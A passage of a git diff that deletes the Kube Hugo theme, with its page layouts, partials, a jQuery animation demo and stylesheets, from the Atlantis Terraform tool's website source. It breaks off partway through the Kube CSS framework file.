diff --git a/website/src/themes/kube/archetypes/docs.md b/website/src/themes/kube/archetypes/docs.md
deleted file mode 100644
index fa23e66f29..0000000000
--- a/website/src/themes/kube/archetypes/docs.md
+++ /dev/null
@@ -1,8 +0,0 @@
-+++
-title = ""
-description = ""
-weight = 20
-draft = false
-bref = ""
-toc = true
-+++
diff --git a/website/src/themes/kube/layouts/404.html b/website/src/themes/kube/layouts/404.html
deleted file mode 100644
index 3ed469bf29..0000000000
--- a/website/src/themes/kube/layouts/404.html
+++ /dev/null
@@ -1,12 +0,0 @@
-{{ define "title"}} {{ .Site.Title}} {{end}}
-{{ define "header"}} {{ partial "header" .}} {{end}}
-{{ define "main"}}
-
-<div id="main">
-    <div id="hero">
-        <img class="logo" src="/img/atlantis-logo.png"/>
-        <h1>404 Not Found</h1>
-    </div>
-</div>
-{{ end }}
-{{ define "footer"}} {{ partial "footer" .}} {{end}}
diff --git a/website/src/themes/kube/layouts/_default/baseof.html b/website/src/themes/kube/layouts/_default/baseof.html
deleted file mode 100644
index 3cd6d683a8..0000000000
--- a/website/src/themes/kube/layouts/_default/baseof.html
+++ /dev/null
@@ -1,68 +0,0 @@
-<!DOCTYPE html>
-<html lang="{{ .Site.LanguageCode }}">
-
-<head>
-  {{ .Hugo.Generator }}
-  <meta charset="utf-8">
-  <meta http-equiv="X-UA-Compatible" content="IE=edge">
-  <meta name="viewport" content="width=device-width, initial-scale=1">
-  <title>{{ block "title" . }}{{ .Title }} | {{ .Site.Title }}{{ end }}</title>
-
-  {{ with .Description }}
-  <meta name="description" content="{{ . }}"> {{ end }}
-  <!-- noindex meta -->
-  {{ $default_noindex_kinds := slice "section" "taxonomy" "taxonomyTerm" }}
-  {{ $noindex_kinds := .Site.Params.noindex_kinds | default $default_noindex_kinds }}
-  {{ $is_noindex_true := and (isset .Params "noindex") .Params.noindex }}
-  {{ if or (in $noindex_kinds .Kind) ($is_noindex_true) }}
-  <meta name="robots" content="noindex">
-  {{ end }}
-
-    {{ partial "meta/name-author" . }}
-  {{ template "_internal/opengraph.html" . }}
-  {{ partial "meta/ogimage" . }}
-  <!-- Site verification -->
-  {{ if .IsHome }} {{ partial "site-verification" . }} {{ end }}
-  <!-- add googleAnalytics in config.toml -->
-  {{ template "_internal/google_analytics_async.html" . }}
-  {{ if .RSSLink }}
-  <link href="{{ .RSSLink }}" rel="alternate" type="application/rss+xml" title="{{ .Site.Title }}" /> {{ end }}
-
-  <link rel="canonical" href="{{ .Permalink }}"> {{ if (isset .Params "prev") }}
-  <link rel="prev" href="{{ .Params.prev }}"> {{ end }} {{ if (isset .Params "next") }}
-  <link rel="next" href="{{ .Params.next }}"> {{ end }}
-
-  {{ partial "favicon" . }}
-
-  <link href="/css/font.css" rel="stylesheet" type="text/css">
-  <link href="/css/kube.min.css" rel="stylesheet" type="text/css">
-  <link href="/css/kube.legenda.css" rel="stylesheet" type="text/css">
-  <link href="/css/highlight.css" rel="stylesheet" type="text/css">
-  <link href="/css/master.css" rel="stylesheet" type="text/css">
-  <link href="/css/kube.demo.css" rel="stylesheet" type="text/css">
-<!-- Your own theme here -->
- <link href="/css/custom.css" rel="stylesheet" type="text/css">
-<!-- js vendor -->
-  <script src="/js/jquery-2.1.4.min.js" type="text/javascript">
-  </script>
-
-  <script type="text/javascript" src="/js/tocbot.min.js"></script>
-  <script async defer src="https://buttons.github.io/buttons.js"></script>
-</head>
-
-
-<body class="page-kube">
-  <header>{{ block "header" . }}{{ end }}</header>
-  <main>{{ block "main" . }}{{ end }}</main>
-  <footer>{{ block "footer" . }}{{ end }}</footer>
-
-
-  <script src="/js/kube.js" type="text/javascript">
-  </script>
-  <script src="/js/kube.legenda.js" type="text/javascript">
-  </script>
-  <script src="/js/master.js" type="text/javascript">
-  </script>
-</body>
-
-</html>
diff --git a/website/src/themes/kube/layouts/_default/list.html b/website/src/themes/kube/layouts/_default/list.html
deleted file mode 100644
index f154781987..0000000000
--- a/website/src/themes/kube/layouts/_default/list.html
+++ /dev/null
@@ -1,18 +0,0 @@
-{{ define "title"}} {{ .Title}} {{end}}
-{{ define "header"}} {{ partial "header" .}} {{end}}
-
-{{ define "main" }}
-
-<div id="hero" class="wrap">
-  <h1>Blog</h1>
-</div>
-<ul id="posts">
-
- {{ range .Paginator.Pages.ByWeight }} {{ partial "page-summary" . }} {{ end }}
-  <section>{{ partial "pagination" .}}</section>
-</ul>
-
-{{ end }} 
-{{ define "footer" }} 
-  {{ partial "footer" . }} 
-{{ end }}
\ No newline at end of file
diff --git a/website/src/themes/kube/layouts/_default/single.html b/website/src/themes/kube/layouts/_default/single.html
deleted file mode 100644
index 2e3618eba2..0000000000
--- a/website/src/themes/kube/layouts/_default/single.html
+++ /dev/null
@@ -1,18 +0,0 @@
-{{ define "title"}} {{ .Title}} {{end}}
-{{ define "header"}} {{ partial "header" .}} {{end}}
-
-{{ define "main" }}
-
-<div id="hero" class="wrap">
-  <h1>{{.Title }}</h1>
-    <p>{{.Params.description}}</p>
-</div>
-<ul id="posts">
-
- {{ .Content }}
-  
-</ul>
-{{ end }} 
-{{ define "footer" }} 
-  {{ partial "footer" . }} 
-{{ end }}
\ No newline at end of file
diff --git a/website/src/themes/kube/layouts/blog/single.html b/website/src/themes/kube/layouts/blog/single.html
deleted file mode 100644
index 92125be260..0000000000
--- a/website/src/themes/kube/layouts/blog/single.html
+++ /dev/null
@@ -1,58 +0,0 @@
-{{ define "title"}} {{ .Title}} {{end}}
-{{ define "header"}} {{ partial "header" .}} {{end}}
-
-{{ define "main"}}
-<div class="push-center" itemscope itemtype="http://schema.org/BlogPosting">
-    {{ template "_internal/schema.html" . }}
-<div id="hero">
-    <h1 itemprop="headline">  {{.Title}}</h1>
-    {{ if .Description }}
-<blockquote itemprop="description">{{ .Description }}</blockquote>
-{{ end }}
-<time class="post-time">{{ partial "post/meta" . }}</time>
-</div>
-<div id="post-box">
-<div id="post" itemprop="articleBody">
-    
-    {{.Content | safeHTML}}
-
-</div>
-
-<!--
-<div class="form-subscribe">
-    <div id="form-subscribe-success" style="display: none;"></div>
-<div id="form-subscribe-box">
-        <h4>All about Redactor, Grafs and Kube.</h4>
-        <p>Monthly news &amp; updates. Just straight to the point.</p>
-
-        <form action="" name="mc-embedded-subscribe-form" method="post" class="form"><input type="hidden" name="authorize-token" value="">
-            <div id="subscribe-email-validation-error"></div>
-            <div class="form-item">
-                <div class="append">
-                    <input type="email" name="EMAIL" id="mce-EMAIL" placeholder="Email">
-                    <button class="button">Subscribe</button>
-                </div>
-            </div>
-    
-            --><!-- real people should not fill this in and expect good things - do not remove this or risk form bot signups-->
-            <!--<div style="position: absolute; left: -5000px;" aria-hidden="true"><input type="text" name="" tabindex="-1" value=""></div>
-        </form>
-
-    </div>
-</div> -->
-
-    <div class="">
-        {{ partial "post/byauthor" . }}
-        {{ partial "post/related-content" . }}
-    </div>
-    
-    {{ if .Site.DisqusShortname }}
-    <article>
-        {{ template "_internal/disqus.html" . }}
-    </article>
-    {{ end }}
-    
-</div>
-</div>
-{{ end }}
-{{ define "footer"}} {{ partial "footer.html" .}} {{ end }}
\ No newline at end of file
diff --git a/website/src/themes/kube/layouts/docs/single.html b/website/src/themes/kube/layouts/docs/single.html
deleted file mode 100644
index 0f0f15324f..0000000000
--- a/website/src/themes/kube/layouts/docs/single.html
+++ /dev/null
@@ -1,23 +0,0 @@
-{{ define "title"}} {{ .Title}} {{end}}
-{{ define "header"}} {{ partial "header" .}} {{end}}
-{{ define "main"}}
-  <div id="main">
-    <div id="hero">
-      <h1> {{ .Title}} </h1>
-      <p class="hero-lead">
-           {{ .Params.bref | safeHTML }}.
-      </p>
-
-    </div> 
-    <div id="kube-component" class="content">
-    {{ partial "toc" .}}
-
-    {{ .Content}}
-<!-- Inject script tag in this template  -->
-    {{if .Params.script}}
-     {{ $script := (delimit (slice "scripts" .Params.script) "/")}}
-    {{ partial (string $script) .}}
-    {{end }}
-    </div>
-    </div>
-{{ end }}
diff --git a/website/src/themes/kube/layouts/index.html b/website/src/themes/kube/layouts/index.html
deleted file mode 100644
index 01e57e7530..0000000000
--- a/website/src/themes/kube/layouts/index.html
+++ /dev/null
@@ -1,46 +0,0 @@
-{{ define "title"}} {{ .Site.Title}} {{end}}
-{{ define "header"}} {{ partial "header" .}} {{end}}
-{{ define "main"}}
-
-<div id="main">
-    <div id="hero">
-        <img class="logo" src="/img/atlantis-logo.png"/>
-        <h1>{{.Title}}</h1>
-        <p>{{.Description}}</p>
-    </div>
-    <div id="action-buttons">
-        <a class="button primary big" href="https://github.com/runatlantis/atlantis/releases/latest">Download</a> <a
-            class="button outline big" href="https://github.com/runatlantis/atlantis#getting-started">Get Started</a>
-    </div>
-    <div id="kube-features">
-        <div class="row gutters">
-            <div class="col col-4 item">
-                <figure>
-                    <img alt="Collaborate" height="48" src="/img/collaborate.png" width="48">
-                </figure>
-                <h3>Collaborate on Terraform with your team</h3>
-                <p>Run terraform plan and apply from GitHub/GitLab pull requests so everyone can review the output</p>
-            </div>
-            <div class="col col-4 item">
-                <figure>
-                    <img alt="No need to distribute credentials" height="48" src="/img/no-need-to-distribute-keys.png"
-                         width="48">
-                </figure>
-                <h3>No need to distribute credentials</h3>
-                <p>No need to distribute credentials to your whole team. Developers can submit Terraform changes and run
-                    plan and apply directly from the pull request.</p>
-            </div>
-            <div class="col col-4 item">
-                <figure>
-                    <img alt="Lock Workspaces/Environments" height="48" src="/img/locking.png" width="48">
-                </figure>
-                <h3>Lock workspaces/environments</h3>
-                <p>Lock workspaces/environments until pull requests are merged to prevent concurrent modification and
-                    confusion.</p>
-            </div>
-        </div>
-    </div>
-    <div style="text-align: center; font-size: 21px; line-height: 32px; color: rgba(0,0,0,0.5)"><p>Read about <a href="https://medium.com/runatlantis/introducing-atlantis-6570d6de7281">Why We Built Atlantis</a><p></div>
-</div>
-{{ end }}
-{{ define "footer"}} {{ partial "footer" .}} {{end}}
\ No newline at end of file
diff --git a/website/src/themes/kube/layouts/partials/favicon.html b/website/src/themes/kube/layouts/partials/favicon.html
deleted file mode 100644
index c8b8e683c1..0000000000
--- a/website/src/themes/kube/layouts/partials/favicon.html
+++ /dev/null
@@ -1 +0,0 @@
-<link rel="shortcut icon" type="image/png" href="/img/logo-384x384.png">
diff --git a/website/src/themes/kube/layouts/partials/footer.html b/website/src/themes/kube/layouts/partials/footer.html
deleted file mode 100644
index 30946705eb..0000000000
--- a/website/src/themes/kube/layouts/partials/footer.html
+++ /dev/null
@@ -1,26 +0,0 @@
-  <footer id="footer">
-    <nav>
-      <ul>
-        <li>
-          <a href="https://medium.com/runatlantis">Blog</a>
-        </li>
-        <li>
-          <a href="https://github.com/runatlantis/atlantis#getting-started">Docs</a>
-        </li>
-        <li>
-          <a href="https://github.com/runatlantis/atlantis#faq">FAQ</a>
-        </li>
-      </ul>
-    </nav>
-    <p>&copy; Apache License 2.0.</p>
-  </footer>
-  <script>
-    (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
-    (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
-    m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
-    })(window,document,'script','https://www.google-analytics.com/analytics.js','ga');
-  
-    ga('create', 'UA-106153942-1', 'auto');
-    ga('send', 'pageview');
-  
-  </script>
\ No newline at end of file
diff --git a/website/src/themes/kube/layouts/partials/header.html b/website/src/themes/kube/layouts/partials/header.html
deleted file mode 100644
index 838d8addad..0000000000
--- a/website/src/themes/kube/layouts/partials/header.html
+++ /dev/null
@@ -1,27 +0,0 @@
-  <div class="show-sm">
-    <div id="nav-toggle-box">
-      <div id="nav-toggle-brand">
-        <a href="/">Atlantis</a>
-      </div><a data-component="toggleme" data-target="#top" href="#" id="nav-toggle"><i class="kube-menu"></i></a>
-    </div>
-  </div>
-  <div class="hide-sm" id="top">
-    <div id="top-brand">
-      <a href="/" title="home">Atlantis</a>
-    </div>
-    <nav id="top-nav-main">
-      <ul>
-       {{ $currentPage := . }}
-       {{ range .Site.Menus.main }}
-    <li><a href="{{ .URL }}" {{if  $currentPage.IsMenuCurrent "main" . }} class="active"{{end}}>{{ .Name }}</a></li>
-    {{end}}
-      </ul>
-    </nav>
-    <nav id="top-nav-extra">
-      <ul>
-        <li>
-          <a class="github-button" href="https://github.com/runatlantis/atlantis" data-icon="octicon-star" data-size="large" aria-label="Star runatlantis/atlantis on GitHub">Star</a>
-        </li>
-      </ul>
-    </nav>
-  </div>
\ No newline at end of file
diff --git a/website/src/themes/kube/layouts/partials/meta/name-author.html b/website/src/themes/kube/layouts/partials/meta/name-author.html
deleted file mode 100644
index 974c77f8fe..0000000000
--- a/website/src/themes/kube/layouts/partials/meta/name-author.html
+++ /dev/null
@@ -1,6 +0,0 @@
-
-{{ if isset .Params "author" }}
-  <meta name="author" content="{{ index .Params "author" }}">
-{{ else }}
-  <meta name="author" content="{{ .Site.Params.author }}">
-{{ end }}
diff --git a/website/src/themes/kube/layouts/partials/meta/ogimage.html b/website/src/themes/kube/layouts/partials/meta/ogimage.html
deleted file mode 100644
index 7a87ff4a9d..0000000000
--- a/website/src/themes/kube/layouts/partials/meta/ogimage.html
+++ /dev/null
@@ -1,8 +0,0 @@
-
-{{ if and (.IsNode) (.Site.Params.images) }}
-  <meta property="og:image" content="{{ index .Site.Params.images 0 }}">
-{{ end }}
-
-{{ if and (.IsPage) (not .Params.images) (.Site.Params.images) }}
-  <meta property="og:image" content="{{ index .Site.Params.images 0 }}">
-{{ end }}
diff --git a/website/src/themes/kube/layouts/partials/page-summary.html b/website/src/themes/kube/layouts/partials/page-summary.html
deleted file mode 100644
index 403ea837e5..0000000000
--- a/website/src/themes/kube/layouts/partials/page-summary.html
+++ /dev/null
@@ -1,9 +0,0 @@
-<div itemscope itemtype="http://schema.org/CreativeWork">
-    <h2 class="title">
-        <a href="{{ .Permalink }}" itemprop="headline">{{ .Title }}</a>
-    </h2>
-    <hr>
-    {{ if .Description }}
-    <p itemprop="about">{{ .Description }}</p>
-    {{ end }}
-</div>
diff --git a/website/src/themes/kube/layouts/partials/pagination.html b/website/src/themes/kube/layouts/partials/pagination.html
deleted file mode 100644
index 95353e5f33..0000000000
--- a/website/src/themes/kube/layouts/partials/pagination.html
+++ /dev/null
@@ -1,15 +0,0 @@
-<nav class="pagination pager align-center">
-            <hr>
-    <ul>
-           {{if .Paginator.HasPrev }}
-        <li class="prev"><a href="{{ .Paginator.Prev.URL }}">Previous</a></li>
-        {{ end }}
-        <li>
-
-        <a href="" class="button round small outline">Page {{ .Paginator.PageNumber }} of {{ .Paginator.TotalPages }}</a>
-        </li>
-            {{ if .Paginator.HasNext }}</a>
-        <li class="next"><a href="{{ .Paginator.Next.URL }}">Next</a></li>
-           {{ end }}
-    </ul>
-</nav>
\ No newline at end of file
diff --git a/website/src/themes/kube/layouts/partials/post/byauthor.html b/website/src/themes/kube/layouts/partials/post/byauthor.html
deleted file mode 100644
index 579a64d3e2..0000000000
--- a/website/src/themes/kube/layouts/partials/post/byauthor.html
+++ /dev/null
@@ -1,20 +0,0 @@
-<p>
-  Published
-  {{ if ne .Site.Params.hide_author true }}
-    {{ with .Params.author }}
-      by <span itemprop="author">{{ index . }}</span>
-    {{ else }}
-      by <span itemprop="author">{{ .Site.Params.author }}</span>
-    {{ end }}
-  {{ end }}
-  <time datetime="{{ dateFormat "2006-01-02T15:04:05-07:00" (default .Date (.PublishDate)) }}">
-    {{ dateFormat "2 Jan, 2006" (default .Date (.PublishDate)) }}
-  </time>
-  {{ with .Params.categories }}
-    in <span itemprop="articleSection">{{ delimit (apply (apply (sort .) "partial" "post/category-link" ".") "chomp" ".") ", " " and " }}</span>
-  {{ end }}
-  {{ with .Params.tags }}
-    and tagged {{ delimit (apply (apply (sort .) "partial" "post/tag-link" ".") "chomp" ".") ", " " and " }}
-  {{ end }}
-  using <span itemprop="wordCount">{{ .WordCount }}</span> words.
-</p>
diff --git a/website/src/themes/kube/layouts/partials/post/category-link.html b/website/src/themes/kube/layouts/partials/post/category-link.html
deleted file mode 100644
index 6bee96b1af..0000000000
--- a/website/src/themes/kube/layouts/partials/post/category-link.html
+++ /dev/null
@@ -1 +0,0 @@
-<a href="/categories/{{ . | urlize }}/">{{ . }}</a>
diff --git a/website/src/themes/kube/layouts/partials/post/meta.html b/website/src/themes/kube/layouts/partials/post/meta.html
deleted file mode 100644
index 62b4b451de..0000000000
--- a/website/src/themes/kube/layouts/partials/post/meta.html
+++ /dev/null
@@ -1,14 +0,0 @@
-<span class="icon">
-  <i class="fa fa-clock-o" aria-hidden="true"></i>
-</span>
-<span>{{ .ReadingTime }} minute read</span>
-<span class="icon">
- <i class="fa fa-pencil" aria-hidden="true"></i>
-</span>
-{{ if .PublishDate.IsZero }}
-  Published: <time datetime="{{ .Date.Format "2006-01-02T15:04:05-07:00" }}">{{ .Date.Format "2 Jan, 2006" }}</time>
-{{ else if lt .PublishDate .Lastmod }}
-  Modified: <time datetime="{{ .Lastmod.Format "2006-01-02T15:04:05-07:00" }}">{{ .Lastmod.Format "2 Jan, 2006" }}</time>
-{{ else }}
-  Published: <time datetime="{{ .PublishDate.Format "2006-01-02T15:04:05-07:00" }}">{{ .PublishDate.Format "2 Jan, 2006" }}</time>
-{{ end }}
diff --git a/website/src/themes/kube/layouts/partials/post/related-content.html b/website/src/themes/kube/layouts/partials/post/related-content.html
deleted file mode 100644
index 49310b6083..0000000000
--- a/website/src/themes/kube/layouts/partials/post/related-content.html
+++ /dev/null
@@ -1,16 +0,0 @@
-{{ range first 1 (where (where .Site.Pages ".Params.tags" "intersect" .Params.tags) "Permalink" "!=" .Permalink) }}
-  {{ $.Scratch.Set "has_related" true }}
-{{ end }}
-
-{{ if $.Scratch.Get "has_related" }}
-  <aside>
-    <heade><strong>Related Content</strong></header>
-    <hr>
-    <ul>
-      {{ $num_to_show := .Site.Params.related_content_limit | default 7 }}
-      {{ range first $num_to_show (where (where .Site.Pages ".Params.tags" "intersect" .Params.tags) "Permalink" "!=" .Permalink) }}
-        <li><a href="{{ .RelPermalink }}">{{ .Title }}</a> &ndash; {{ .ReadingTime }} minutes
-      {{ end }}
-    </ul>
-  </aside>
-{{ end }}
diff --git a/website/src/themes/kube/layouts/partials/post/tag-link.html b/website/src/themes/kube/layouts/partials/post/tag-link.html
deleted file mode 100644
index 8c03421001..0000000000
--- a/website/src/themes/kube/layouts/partials/post/tag-link.html
+++ /dev/null
@@ -1 +0,0 @@
-<a href="/tags/{{ . | urlize }}/">{{ . }}</a>
diff --git a/website/src/themes/kube/layouts/partials/scripts/animation.html b/website/src/themes/kube/layouts/partials/scripts/animation.html
deleted file mode 100644
index ee13095f35..0000000000
--- a/website/src/themes/kube/layouts/partials/scripts/animation.html
+++ /dev/null
@@ -1,127 +0,0 @@
-<script>
-document.addEventListener("DOMContentLoaded",
-function(){
-    var animate = {
-        '#slide-up-btn': {
-            el: '#animation-box-slide-up',
-            to: 'slideUp',
-            back: 'slideDown'
-        },
-        '#slide-down-btn': {
-            el: '#animation-box-slide-down',
-            to: 'slideDown',
-            back: 'slideUp'
-        },
-        '#fade-in-btn': {
-            el: '#animation-box-fade-in',
-            to: 'fadeIn',
-            back: 'fadeOut'
-        },
-        '#fade-out-btn': {
-            el: '#animation-box-fade-out',
-            to: 'fadeOut',
-            back: 'fadeIn'
-        },
-        '#flip-in-btn': {
-            el: '#animation-box-flip-in',
-            to: 'flipIn',
-            back: 'flipOut'
-        },
-        '#flip-out-btn': {
-            el: '#animation-box-flip-out',
-            to: 'flipOut',
-            back: 'flipIn'
-        },
-        '#zoom-in-btn': {
-            el: '#animation-box-zoom-in',
-            to: 'zoomIn',
-            back: 'zoomOut'
-        },
-        '#zoom-out-btn': {
-            el: '#animation-box-zoom-out',
-            to: 'zoomOut',
-            back: 'zoomIn'
-        },
-        '#slide-in-right-btn': {
-            el: '#animation-box-slide-in-right',
-            to: 'slideInRight',
-            back: 'slideOutRight'
-        },
-        '#slide-in-left-btn': {
-            el: '#animation-box-slide-in-left',
-            to: 'slideInLeft',
-            back: 'slideOutLeft'
-        },
-        '#slide-in-down-btn': {
-            el: '#animation-box-slide-in-down',
-            to: 'slideInDown',
-            back: 'slideOutUp'
-        },
-        '#slide-out-right-btn': {
-            el: '#animation-box-slide-out-right',
-            to: 'slideOutRight',
-            back: 'slideInRight'
-        },
-        '#slide-out-left-btn': {
-            el: '#animation-box-slide-out-left',
-            to: 'slideOutLeft',
-            back: 'slideInLeft'
-        },
-        '#slide-out-up-btn': {
-            el: '#animation-box-slide-out-up',
-            to: 'slideOutUp',
-            back: 'slideInDown'
-        },
-    };
-
-    for (var key in animate)
-    {
-        $(key).attr('data-el', animate[key].el);
-        $(key).attr('data-to', animate[key].to);
-        $(key).attr('data-back', animate[key].back);
-
-        $(key).on('click', function(e)
-        {
-            e.preventDefault();
-            var $btn = $(e.target);
-            if ($btn.hasClass('demo-muted-link'))
-            {
-                return;
-            }
-
-            var $el = $($btn.attr('data-el'));
-            $btn.addClass('demo-muted-link');
-
-            $el.animation($btn.attr('data-to'));
-            setTimeout(function() {
-
-                $el.animation($btn.attr('data-back'));
-                $btn.removeClass('demo-muted-link');
-
-            }, 1500);
-
-        });
-    }
-
-
-    $('#rotate-btn').on('click', function(e)
-    {
-        e.preventDefault();
-        $('#animation-box-rotate').animation('rotate');
-    });
-
-    $('#shake-btn').on('click', function(e)
-    {
-        e.preventDefault();
-        $('#animation-box-shake').animation('shake');
-    });
-
-    $('#pulse-btn').on('click', function(e)
-    {
-        e.preventDefault();
-        $('#animation-box-pulse').animation('pulse');
-    });
-
-
-});
-</script>
\ No newline at end of file
diff --git a/website/src/themes/kube/layouts/partials/site-verification.html b/website/src/themes/kube/layouts/partials/site-verification.html
deleted file mode 100644
index c4d8b05d9b..0000000000
--- a/website/src/themes/kube/layouts/partials/site-verification.html
+++ /dev/null
@@ -1,12 +0,0 @@
-{{ if .Site.Params.seo.webmaster_verifications.google }}
-  <meta name="google-site-verification" content="{{ .Site.Params.seo.webmaster_verifications.google }}" />
-{{ end }}
-{{ if .Site.Params.seo.webmaster_verifications.bing }}
-  <meta name="msvalidate.01" content="{{ .Site.Params.seo.webmaster_verifications.bing }}">
-{{ end }}
-{{ if .Site.Params.seo.webmaster_verifications.alexa }}
-  <meta name="alexaVerifyID" content="{{ .Site.Params.seo.webmaster_verifications.alexa }}">
-{{ end }}
-{{ if .Site.Params.seo.webmaster_verifications.yandex }}
-  <meta name="yandex-verification" content="{{ .Site.Params.seo.webmaster_verifications.yandex }}">
-{{ end }}
diff --git a/website/src/themes/kube/layouts/partials/toc.html b/website/src/themes/kube/layouts/partials/toc.html
deleted file mode 100644
index ccc3f3d954..0000000000
--- a/website/src/themes/kube/layouts/partials/toc.html
+++ /dev/null
@@ -1,21 +0,0 @@
-{{ if and (isset .Params "toc") .Params.toc }}
-<nav id="contents">
-    <ol class="js-toc">
-    </ol>
-</nav>
-<script type="text/javascript">
-document.addEventListener("DOMContentLoaded",
-function(){
-tocbot.init({
-// Where to render the table of contents.
-tocSelector: '.js-toc',
-// Where to grab the headings to build the table of contents.
-contentSelector: '.content',
-// Which headings to grab inside of the contentSelector element.
-headingSelector: 'h3'
-})
-}
-);
-</script>
-
-{{ end }}
\ No newline at end of file
diff --git a/website/src/themes/kube/layouts/section/docs.html b/website/src/themes/kube/layouts/section/docs.html
deleted file mode 100644
index 09156ddbe1..0000000000
--- a/website/src/themes/kube/layouts/section/docs.html
+++ /dev/null
@@ -1,22 +0,0 @@
-{{ define "title"}} {{ .Title}} {{end}}
-{{ define "header"}} {{ partial "header" .}} {{end}}
-{{ define "main"}}
-<div id="main">
-  <div id="hero">
-    <h1>Documentation</h1>
-  </div>
-  <div id="components">
-    <div class="row gutters">
-      {{ range .Data.Pages.ByWeight }}
-      <div class="col col-4 item">
-        <h4><a href="{{ .Permalink }}">{{ .Title }}</a></h4>
-        <p>{{ .Params.description }}</p>
-      </div>
-      {{ end }}
-
-    </div>
-  </div>
-</div>
-{{ end }}
-
-{{ define "footer"}} {{ partial "footer" .}} {{end}}
\ No newline at end of file
diff --git a/website/src/themes/kube/layouts/section/faq.html b/website/src/themes/kube/layouts/section/faq.html
deleted file mode 100644
index 23ed5e2461..0000000000
--- a/website/src/themes/kube/layouts/section/faq.html
+++ /dev/null
@@ -1,16 +0,0 @@
-{{ define "title"}} {{ .Title}} {{end}}
-{{ define "header"}} {{ partial "header" .}} {{end}}
-
-{{ define "main" }}
-
-<div id="hero" class="wrap">
-  <h1>{{.Title }}</h1>
-    <p>{{.Params.description}}<br></p>
-</div>
-<div id="kube-faq">
-{{.Content}}
-</div>
-{{ end }} 
-{{ define "footer" }} 
-  {{ partial "footer" . }} 
-{{ end }}
\ No newline at end of file
diff --git a/website/src/themes/kube/static/css/custom.css b/website/src/themes/kube/static/css/custom.css
deleted file mode 100644
index d6d73606e8..0000000000
--- a/website/src/themes/kube/static/css/custom.css
+++ /dev/null
@@ -1,6 +0,0 @@
-  .logo {
-    height: 200px; }
-
-  figure figcaption {
-      text-align: center;
-  }
\ No newline at end of file
diff --git a/website/src/themes/kube/static/css/font.css b/website/src/themes/kube/static/css/font.css
deleted file mode 100644
index 9f19ed4736..0000000000
--- a/website/src/themes/kube/static/css/font.css
+++ /dev/null
@@ -1,68 +0,0 @@
-@font-face {
-    font-family: 'Lato';
-    src: url('../font/Lato-Light.woff') format('woff');
-    font-weight: 300;
-    font-style: normal;
-}
-
-@font-face {
-    font-family: 'Lato';
-    src: url('../font/Lato-LightItalic.woff') format('woff');
-    font-weight: 300;
-    font-style: italic;
-}
-@font-face {
-    font-family: 'Lato';
-    src: url('../font/Lato-Black.woff') format('woff');
-    font-weight: 900;
-    font-style: normal;
-}
-
-@font-face {
-    font-family: 'Lato';
-    src: url('../font/Lato-BlackItalic.woff') format('woff');
-    font-weight: 900;
-    font-style: italic;
-}
-
-@font-face {
-    font-family: 'Lato';
-    src: url('../font/Lato-Bold.woff') format('woff');
-    font-weight: bold;
-    font-style: normal;
-}
-
-@font-face {
-    font-family: 'Lato';
-    src: url('../font/Lato-BoldItalic.woff') format('woff');
-    font-weight: bold;
-    font-style: italic;
-}
-
-@font-face {
-    font-family: 'Lato';
-    src: url('../font/Lato-Semibold.woff') format('woff');
-    font-weight: 500;
-    font-style: normal;
-}
-
-@font-face {
-    font-family: 'Lato';
-    src: url('../font/Lato-SemiboldItalic.woff') format('woff');
-    font-weight: 500;
-    font-style: italic;
-}
-
-@font-face {
-    font-family: 'Lato';
-    src: url('../font/Lato-Italic.woff') format('woff');
-    font-weight: normal;
-    font-style: italic;
-}
-
-@font-face {
-    font-family: 'Lato';
-    src: url('../font/Lato-Regular.woff') format('woff');
-    font-weight: normal;
-    font-style: normal;
-}
\ No newline at end of file
diff --git a/website/src/themes/kube/static/css/highlight.css b/website/src/themes/kube/static/css/highlight.css
deleted file mode 100644
index 7d8be18d05..0000000000
--- a/website/src/themes/kube/static/css/highlight.css
+++ /dev/null
@@ -1 +0,0 @@
-.hljs{display:block;overflow-x:auto;padding:0.5em;background:#F0F0F0}.hljs,.hljs-subst{color:#444}.hljs-comment{color:#888888}.hljs-keyword,.hljs-attribute,.hljs-selector-tag,.hljs-meta-keyword,.hljs-doctag,.hljs-name{font-weight:bold}.hljs-type,.hljs-string,.hljs-number,.hljs-selector-id,.hljs-selector-class,.hljs-quote,.hljs-template-tag,.hljs-deletion{color:#880000}.hljs-title,.hljs-section{color:#880000;font-weight:bold}.hljs-regexp,.hljs-symbol,.hljs-variable,.hljs-template-variable,.hljs-link,.hljs-selector-attr,.hljs-selector-pseudo{color:#BC6060}.hljs-literal{color:#78A960}.hljs-built_in,.hljs-bullet,.hljs-code,.hljs-addition{color:#397300}.hljs-meta{color:#1f7199}.hljs-meta-string{color:#4d99bf}.hljs-emphasis{font-style:italic}.hljs-strong{font-weight:bold}
\ No newline at end of file
diff --git a/website/src/themes/kube/static/css/kube.css b/website/src/themes/kube/static/css/kube.css
deleted file mode 100644
index d5960ce52d..0000000000
--- a/website/src/themes/kube/static/css/kube.css
+++ /dev/null
@@ -1,2156 +0,0 @@
-/*
-	Kube. CSS & JS Framework
-	Version 6.5.2
-	Updated: February 2, 2017
-
-	http://imperavi.com/kube/
-
-	Copyright (c) 2009-2017, Imperavi LLC.
-	License: MIT
-*/
-html {
-  box-sizing: border-box; }
-
-*,
-*:before,
-*:after {
-  box-sizing: inherit; }
-
-* {
-  margin: 0;
-  padding: 0;
-  outline: 0;
-  -webkit-overflow-scrolling: touch; }
-
-img,
-video,
-audio {
-  max-width: 100%; }
-
-img,
-video {
-  height: auto; }
-
-svg {
-  max-height: 100%; }
-
-iframe {
-  border: none; }
-
-::-moz-focus-inner {
-  border: 0;
-  padding: 0; }
-
-input[type="radio"],
-input[type="checkbox"] {
-  vertical-align: middle;
-  position: relative;
-  bottom: 0.15rem;
-  font-size: 115%;
-  margin-right: 3px; }
-
-input[type="search"] {
-  -webkit-appearance: textfield; }
-
-input[type="search"]::-webkit-search-decoration,
-input[type="search"]::-webkit-search-cancel-button {
-  -webkit-appearance: none; }
-
-.black {
-  color: #0d0d0e; }
-
-.inverted {
-  color: #fff; }
-
-.error {
-  color: #f03c69; }
-
-.success {
-  color: #35beb1; }
-
-.warning {
-  color: #f7ba45; }
-
-.focus {
-  color: #1c86f2; }
-
-.aluminum {
-  color: #f8f8f8; }
-
-.silver {
-  color: #e0e1e1; }
-
-.lightgray {
-  color: #d4d4d4; }
-
-.gray {
-  color: #bdbdbd; }
-
-.midgray {
-  color: #676b72; }
-
-.darkgray {
-  color: #313439; }
-
-.bg-black {
